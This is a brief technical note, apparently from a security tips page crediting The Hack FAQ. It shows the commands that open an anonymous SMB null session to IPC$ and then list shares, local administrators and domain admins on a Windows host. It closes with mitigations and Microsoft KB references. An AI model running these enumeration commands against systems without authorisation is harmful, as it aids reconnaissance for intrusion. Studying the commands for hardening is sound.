Using NULL sessions to view shares and user accounts

It is possible to access the IPC$ share with a null session, after that one can access information about the machine configuration.

How to create a null session:

net use \\IP_ADDRESS\ipc$ “” /user:””

How to access shares after creation of null session:

net view \\IP_ADDRESS

How to list administrators after creation of null session:

local administrators \\IP_ADDRESS

How to list group members in “domain admins” after creation of null session:

global “domain admins” \\IP_ADDRESS

The utilities local.exe and global.exe. They are part of the Windows NT Resource Kit. WInfo is a 3rd party utility that also can exploit null sessions.

Disabling Netbios or blocking the ports 137-139 doesn’t close for Null-Sessions, unless one also closes the SMB on port 445.

Related Restrict access to NULL sessions

More Info MS KB132679
More Info MS KB289655

Credits The Hack FAQ